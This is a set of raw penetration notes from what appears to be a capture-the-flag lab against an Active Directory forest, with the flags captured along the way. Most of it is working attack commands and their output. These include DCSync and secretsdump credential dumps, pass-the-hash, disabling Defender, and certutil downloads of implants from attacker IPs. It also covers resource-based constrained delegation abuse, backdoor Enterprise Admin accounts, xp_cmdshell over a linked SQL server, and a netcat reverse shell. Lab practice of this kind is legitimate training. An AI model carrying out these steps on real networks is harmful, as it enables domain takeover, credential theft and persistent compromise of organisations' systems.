zsm.local\ca_svc:4104:aad3b435b51404eeaad3b435b51404ee:7f3e79164258b9aeb22e6aff46a5ee69:::
zsm.local\jamie:4602:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
ZPH-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::
MAINTENANCE$:1104:aad3b435b51404eeaad3b435b51404ee:fe00c35591cfa216447f51e436a185d6:::
ZPH-GMSA-ADFS$:1105:aad3b435b51404eeaad3b435b51404ee:4b896425f96da66ebdf84262a2d0296f:::
ZPH-SVRCA01$:1106:aad3b435b51404eeaad3b435b51404ee:251e366fdd64eff18be0824ec7c6833c:::
ZPH-SVRADFS1$:1108:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
ZPH-SVRSQL01$:1601:aad3b435b51404eeaad3b435b51404ee:ecf68b5e132ca80e6864215d5fcbba03:::
ZPH-SVRMGMT1$:4101:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
PAINTERS$:1109:aad3b435b51404eeaad3b435b51404ee:9d9c6188ac651f4e58d7a73a929b6644:::
internal$:1602:aad3b435b51404eeaad3b435b51404ee:e0a8f7125ae32c3775ed9ecbb51c8680:::




# Pass-the-hash via WMI to the parent DC with the zsm.local Administrator NT hash
# from the DCSync output above
wmiexec.py zsm.local/Administrator@192.168.210.10 -hashes aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44


# Inside the wmiexec shell: disable Defender real-time monitoring before dropping the
# implant. This is logged by Defender and can be blocked by Tamper Protection - check
# RealTimeProtectionEnabled in the Get-MpComputerStatus output before continuing.
powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"


# Download the implant with certutil (heavily signatured, acceptable in a lab).
# NOTE(review): the server address differs from the 10.10.14.4 used elsewhere - confirm.
certutil -urlcache -split -f http://10.10.17.0:53/SUBSTANTIAL_CAMPAIGN.exe

SUBSTANTIAL_CAMPAIGN.exe


sliver (SHALLOW_SPADE) > cat flag.txt

ZEPHYR{34t1ng_7h3_B0n3s_0f_N3tw0rks} :Compromised

.14

 
# .14 (ZPH-SVRADFS1): resource-based constrained delegation through marcus.
# Make marcus Enterprise Admin in the parent domain.
net group "Enterprise Admins" marcus /add /domain
 
# PowerView: full control over the ZPH-SVRADFS1 computer object, so marcus can write
# its msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Add-DomainObjectAcl -TargetIdentity ZPH-SVRADFS1 -PrincipalIdentity marcus -Rights All
 
# Attacker box: create a machine account to delegate from (needs MachineAccountQuota > 0
# or equivalent rights); LDAPS is required to set the password at creation time.
# Cleanup afterwards: rbcd.py -action remove, delete the computer object, remove the ACE
# and the group membership - all four are persistent changes in the directory.
addcomputer.py -method LDAPS -computer-name attackersystem -computer-pass 'Summer2018!' -dc-host 192.168.210.10 'zsm.local/marcus:!QAZ2wsx'
 
└─$ rbcd.py -delegate-from attackersystem$ -delegate-to ZPH-SVRADFS1$ -action 'write' 'zsm.local/marcus:!QAZ2wsx'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on ZPH-SVRADFS1$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-2734290894-461713716-141835440-19101)
 
└─$ getST.py -spn 'cifs/ZPH-SVRADFS1.zsm.local' -impersonate 'Administrator' 'zsm.local/attackersystem$:Summer2018!'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
                                          
 
secretsdump.py ZPH-SVRADFS1.zsm.local -k         
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f97e25e06fa0276f8ac5285638eeeba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-08-07 19:12:33)
ZSM.LOCAL/ZPH-GMSA-ADFS$:$DCC2$10240#ZPH-GMSA-ADFS$#053f39834953d372785bf479fd947874: (2023-09-22 13:43:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ZSM\ZPH-SVRADFS1$:plain_password_hex:a9723786a4f3bfd47aed7f7b5af91aea583274dd3e66baa45ff1a9178238918fdb29d094f5c66cc94a47f054fd93f26a8991498f31f465296377b8b02c7bd7c2033bc3b58756dcc4fe581b99c30098f2904aeb360833fcec2436e12f3b90b10563bcd7cdfd46e9a331e10a9adf79a2ca5ae96f300aa166d67d36d5929b61e81669b2ad1a490ded9d4ac00cf62671108094aba5b1136683d3ee86da651d15a22652bec2f0df761ad75598dc0efa4418bed7677a4cd0f2a15bbc95370768028adc6c850ea157c2d906e4a146e66f7e85cfbf55ca0e9466955bd47e71edb5ecfe1f2ef1e44fd22fc419739da3c0c3444077
ZSM\ZPH-SVRADFS1$:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM 
 0000   95 E8 38 F2 47 8A 41 12  A5 77 CA 0A 23 E6 56 28   ..8.G.A..w..#.V(
 0010   85 56 73 10 A9 49 99 6A  B5 5D FB C5 AD B4 4C 76   .Vs..I.j.]....Lv
 0020   3A 07 D8 40 73 ED EE 03  28 5E A6 02 7E 09 38 EA   :..@s...(^..~.8.
 0030   48 55 7F 6D 9C FD 9A 8B  C1 F1 F4 D7 0A 6F 3B D0   HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911 
 0000   46 E1 C3 6A F7 6C 78 9D  44 A1 57 77 F3 91 5D DC   F..j.lx.D.Ww..].
 0010   08 C5 13 51 DA C4 52 19  74 D7 D4 17 38 6C 69 FC   ...Q..R.t...8li.
 0020   CC DD F1 45 F3 8C 72 C6  51 19 4B 98 84 76 A6 B9   ...E..r.Q.K..v..
 0030   5C CF 8F 52 ED 3E 3C AE  4E 2C 95 54 A0 80 32 EB   \..R.><.N,.T..2.
 0040   87 AA 5E D5 9D 61 EE FD  3A 80 63 40 F6 68 30 7B   ..^..a..:.c@.h0{
 0050   FC 1E B8 88 96 22 C4 8A  3C 38 F7 6B 4B B7 F5 EC   ....."..<8.kK...
 0060   22 22 09 E7 E2 39 91 3A  C2 31 F8 14 B8 87 1C F2   ""...9.:.1......
 0070   8E 18 AA D1 FC C4 92 F8  BA E9 21 62 E4 3A 3E 07   ..........!b.:>.
 0080   C1 CD D9 AE 47 79 21 A6  72 34 E5 72 DA 73 D6 C1   ....Gy!.r4.r.s..
 0090   C1 3A CF 30 E3 74 C5 14  A2 CF 37 38 43 DF 26 DA   .:.0.t....78C.&.
 00a0   B2 C6 D6 E9 AE CC E9 12  68 90 61 AB 6B 4D F2 CA   ........h.a.kM..
 00b0   CE 92 98 CD 86 BE 84 2E  07 8B 3E 44 30 56 61 6A   ..........>D0Vaj
 00c0   F8 F1 06 B8 F3 EB 36 F3  A0 EC 3E 1C 0B E6 EE 2F   ......6...>..../
 00d0   F3 47 A2 67 23 0A F6 24  9C 6C 92 86 81 53 6C 7A   .G.g#..$.l...Slz
 00e0   5B 85 91 D9 20 41 27 99  26 12 00 A7 32 B0 69 32   [... A'.&...2.i2
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911:46e1c36af76c789d44a15777f3915ddc08c51351dac4521974d7d417386c69fcccddf145f38c72c651194b988476a6b95ccf8f52ed3e3cae4e2c9554a08032eb87aa5ed59d61eefd3a806340f668307bfc1eb8889622c48a3c38f76b4bb7f5ec222209e7e239913ac231f814b8871cf28e18aad1fcc492f8bae92162e43a3e07c1cdd9ae477921a67234e572da73d6c1c13acf30e374c514a2cf373843df26dab2c6d6e9aecce912689061ab6b4df2cace9298cd86be842e078b3e443056616af8f106b8f3eb36f3a0ec3e1c0be6ee2ff347a267230af6249c6c928681536c7a5b8591d920412799261200a732b06932
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911 
 0000   01 00 00 00 24 02 00 00  10 00 12 01 14 02 1C 02   ....$...........
 0010   1A FF 10 1F 7F 61 70 52  F2 C0 21 31 13 BC 93 28   .....apR..!1...(
 0020   09 28 8E A0 99 D7 CA 77  2C 09 81 96 72 02 76 46   .(.....w,...r.vF
 0030   BE A5 09 7C 34 07 09 22  41 68 F1 29 CD EE 92 FA   ...|4.."Ah.)....
 0040   8F 8E 52 65 6A AE 17 62  1A 4A 95 19 6B DC 7C B6   ..Rej..b.J..k.|.
 0050   29 7E 64 5A 36 27 25 69  F0 5F 44 67 4A CA B4 A6   )~dZ6'%i._DgJ...
 0060   AB 00 15 C0 65 9E 16 AA  3A 56 BA D8 1D D1 A4 BB   ....e...:V......
 0070   62 13 D0 9B 47 8E C2 AE  BB 90 39 D0 A6 40 8B 75   b...G.....9..@.u
 0080   FC DF 15 77 CF C0 BC E3  9E B8 79 11 36 F7 D3 5E   ...w......y.6..^
 0090   38 15 DF 93 BC CB 93 FB  00 37 BF F6 96 12 74 FE   8........7....t.
 00a0   18 D4 72 24 4E 98 B4 7E  FE F1 35 3D A4 3F FA 44   ..r$N..~..5=.?.D
 00b0   9A FB 89 BC AE 30 6D 43  B9 7B 31 DB 78 BE 34 CD   .....0mC.{1.x.4.
 00c0   DB 30 91 06 06 F0 40 C7  86 B9 8C F8 E3 1F 88 69   .0....@........i
 00d0   08 22 05 B4 8B F3 8D 4E  00 79 D5 AE FE AF 8A CC   .".....N.y......
 00e0   52 EC DA 47 18 B5 C6 FB  01 E8 71 F9 5F 9B 75 8A   R..G......q._.u.
 00f0   A3 91 92 14 A7 E2 91 48  54 51 5B B4 30 3F 76 21   .......HTQ[.0?v!
 0100   53 43 5B 09 9F 5A 45 8F  43 44 30 5C 93 F5 86 26   SC[..ZE.CD0\...&
 0110   00 00 73 74 50 3E 1E 0A  A6 C4 72 43 65 66 C0 A3   ..stP>....rCef..
 0120   CD 13 DE AC 53 FE C9 1E  18 2D DE A6 BA 41 A9 5A   ....S....-...A.Z
 0130   A8 22 B7 BE 30 D9 1D 33  BB 2C AE 4D 46 2C D7 FC   ."..0..3.,.MF,..
 0140   89 DF F8 FB 57 65 6F E3  1A D5 9C C3 2F F5 8E 79   ....Weo...../..y
 0150   A6 19 92 30 38 0E 22 9F  FA F2 0F 26 79 DE 60 C3   ...08."....&y.`.
 0160   D9 C3 74 F2 22 87 59 64  3E 51 00 52 0C 38 69 2B   ..t.".Yd>Q.R.8i+
 0170   0E FD 07 F1 00 9C 58 1A  FA 9B B3 F5 81 44 B6 E0   ......X......D..
 0180   80 33 85 A2 A2 FA CB 79  35 2F AB 35 0C E9 51 57   .3.....y5/.5..QW
 0190   35 1A 5D 6F 95 EE 2C A9  19 9F 44 C7 3E 20 1E 88   5.]o..,...D.> ..
 01a0   FF 51 DF E5 66 40 7E 87  A6 7E 64 F9 98 68 D5 6C   .Q..f@~..~d..h.l
 01b0   5F C2 CD 20 97 25 7C EB  B8 F8 04 8B 18 49 16 D4   _.. .%|......I..
 01c0   FC D8 85 C0 DF 03 26 9F  B9 B9 69 1C 91 03 12 13   ......&...i.....
 01d0   88 6B C4 A0 D0 5F 69 58  61 73 7C 40 77 A9 6D 0D   .k..._iXas|@w.m.
 01e0   BB B8 3F 44 D6 41 0C E7  70 61 74 87 D5 63 E3 36   ..?D.A..pat..c.6
 01f0   FE E3 07 71 99 07 D4 A5  09 7E F8 B0 F7 3F 07 DB   ...q.....~...?..
 0200   87 A9 13 22 82 3E BC 61  02 3C 0E 28 BF 10 04 2D   ...".>.a.<.(...-
 0210   B4 51 00 00 BD 1B BD D9  88 0B 00 00 BD BD EC 26   .Q.............&
 0220   88 0B 00 00                                        ....
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911: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
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
 
└─$ cme smb 192.168.210.14 -u Administrator -H '8f97e25e06fa0276f8ac5285638eeeba' --local-auth -x 'type C:\Users\Administrator\Desktop\flag.txt'
SMB         192.168.210.14  445    ZPH-SVRADFS1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:ZPH-SVRADFS1) (signing:False) (SMBv1:False)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] ZPH-SVRADFS1\Administrator:8f97e25e06fa0276f8ac5285638eeeba (Pwn3d!)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] Executed command via atexec
SMB         192.168.210.14  445    ZPH-SVRADFS1     ZEPHYR{C4n7_F0rg3t_ab0u7_7h1s_0n3} : The Forgotten

.19

 
# .19: backdoor user in the parent domain (zsm.local), made Enterprise Admin.
# Both are persistent, easily audited changes - remove when done.
net user jay Pass123!test /add /domain
net group "Enterprise Admins" jay /add /domain
 
On .16 (internal.zsm.local DC) — this "jay" is a separate child-domain account with a different password (Pass@123!test, versus Pass123!test for the zsm.local "jay" above); the later RunasCs and Invoke-Command steps use this child-domain account.
# Child-domain (internal.zsm.local) backdoor user, made Domain Admin there.
# Note the password differs from the parent-domain 'jay' created above.
net user jay Pass@123!test /add /domain
net group "Domain Admins" jay /add /domain
 
# PowerView: full control over the SQL server's computer object, so jay can write
# msDS-AllowedToActOnBehalfOfOtherIdentity on it (RBCD setup for the next step)
Add-DomainObjectAcl -TargetIdentity ZSM-SVRCSQL02$ -PrincipalIdentity jay -Rights All
 
On the attacker box (Linux):
 
# Create a machine account in the child domain to delegate from (LDAPS so the password
# can be set on create; relies on MachineAccountQuota or jay's Domain Admin rights).
addcomputer.py -method LDAPS -computer-name attackersystem3$ -computer-pass 'Summer2018!' -dc-host 192.168.210.16 'internal.zsm.local/jay:Pass@123!test'
 
 
 
# Write attackersystem3$ into msDS-AllowedToActOnBehalfOfOtherIdentity of ZSM-SVRCSQL02$
# (uses jay's rights from the ACL change above). Revert with -action remove when finished.
rbcd.py -delegate-from attackersystem3$ -delegate-to ZSM-SVRCSQL02$ -action 'write' 'internal.zsm.local/jay:Pass@123!test'
 
 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem3$ can now impersonate users on ZSM-SVRCSQL02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem3$   (S-1-5-21-3056178012-3972705859-491075245-17602)
 
 
 
getST.py -spn 'cifs/ZSM-SVRCSQL02.internal.zsm.local' -impersonate 'Administrator' 'internal.zsm.local/attackersystem3$:Summer2018!'
 
 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
 
 
 
 
 
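# $Password is never defined in these notes; as written New-ADUser receives $null and
# will most likely fail to create an enabled account. Build the SecureString first.
$Password = ConvertTo-SecureString '<password>' -AsPlainText -Force

# Create an enabled user directly in the child domain (-Server targets its DC).
# -Enabled is the real parameter name; '-Enable' only worked through PowerShell's
# parameter-prefix matching.
New-ADUser -SamAccountName "ipsec" -UserPrincipalName "ipsec@internal.zsm.local" -Name "ipsec" -Enabled $true -AccountPassword $Password -PassThru -Server "internal.zsm.local"




# Generic template for the same operation against any child domain
New-ADUser -SamAccountName "newusername" -UserPrincipalName "newusername@childdomain.local" -Name "New User" -GivenName "New" -Surname "User" -Enabled $true -AccountPassword $Password -PassThru -Server "DCofChildDomain.childdomain.local"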

.19

 mssqlclient.py zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15 
 
exec_as_login sa
 
-- Linked servers defined on this instance
select srvname from master..sysservers
 
 
-- Query through the link: is the login the link maps to a sysadmin on the remote side?
select * from openquery("ZSM-SVRCSQL02", 'SELECT is_srvrolemember(''sysadmin'')')
 
 
 
-- EXEC ... AT [link] requires RPC Out to be enabled on the link (1 = enabled)
select is_rpc_out_enabled FROM sys.servers WHERE name ='ZSM-SVRCSQL02'
 
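-- Enable xp_cmdshell on the local instance (only needed for local command execution;
-- the linked-server steps below do not depend on it).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';


-- Enable show advanced options on the linked server.
-- EXEC ... AT only works when RPC Out is enabled on the link (is_rpc_out_enabled
-- checked above) and the link's login context is sysadmin on the remote side.
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];

-- Enable xp_cmdshell on the linked server
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];

-- Turning 'show advanced options' back off only hides advanced settings from
-- sp_configure; it does NOT disable xp_cmdshell, which stays enabled until set to 0.
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [ZSM-SVRCSQL02];

-- Cleanup once command execution is no longer needed (advanced options must be
-- visible again to change xp_cmdshell). Leave commented while still in use:
-- EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 0; RECONFIGURE; EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [ZSM-SVRCSQL02];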
 
 
 
-- Execute 'whoami' command on the linked server (reveals the account the remote SQL service runs as)
EXEC('EXEC xp_cmdshell ''whoami'';') AT [ZSM-SVRCSQL02];
 
-- Execute 'ipconfig' command on the linked server (remote host's addressing, useful for pivoting)
EXEC('EXEC xp_cmdshell ''ipconfig'';') AT [ZSM-SVRCSQL02];
 
 
 
-- Stage the implant on the remote host from the attacker's HTTP server (10.10.14.4:53).
-- The drop path is under the mssql_svc profile - presumably the account shown by whoami.
EXEC('EXEC xp_cmdshell ''certutil -urlcache -f http://10.10.14.4:53/SHALLOW_SPADE.exe C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
 
 
-- Run the implant; it executes under the remote SQL service account.
EXEC('EXEC xp_cmdshell ''C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
 
 
 
 
 
# From the implant session on ZSM-SVRCSQL02 (presumably running as mssql_svc): upload the
# helpers, start a listener on the attacker box, then re-spawn as the child-domain 'jay'
# (Domain Admin there) with a reverse shell to 10.10.14.4:53.
# -l 3 = network logon type; unlike the .12 step no --remote-impersonation is used.
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jay Pass@123!test -d internal.zsm.local 'c:\users\mssql_svc\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
 
 
 
 
 
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
ZEPHYR{G0tt4_l1nk_Up_4m_1_r1gh7?}
 
# Lateral move to ZPH-SVRCSUP over WinRM (Invoke-Command) with the child-domain 'jay'.
# The SecureString exists only because PSCredential requires it; the password is still
# plaintext in this script and in the session history.
$secpasswd = ConvertTo-SecureString "Pass@123!test" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("jay", $secpasswd)
Invoke-Command -ComputerName ZPH-SVRCSUP -ScriptBlock { Get-ChildItem C:\ } -Credential $mycreds

.18 (presumably ZPH-SVRCSUP) is reached from .17:

# Same pattern with melissa's child-domain credentials: remote command on ZPH-SVRCSUP
# via Invoke-Command (WinRM), reading the Administrator desktop flag.
$user = 'internal\melissa'
$passwd= 'WinterIsHere2022!'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.PSCredential $user,$secpass
Invoke-Command -ComputerName ZPH-SVRCSUP -Credential $cred -ScriptBlock {type c:\users\administrator\desktop\flag.txt}

ZEPHYR{D0n7_f0rg3t_Imp0rt4nt_Inf0rm4710n}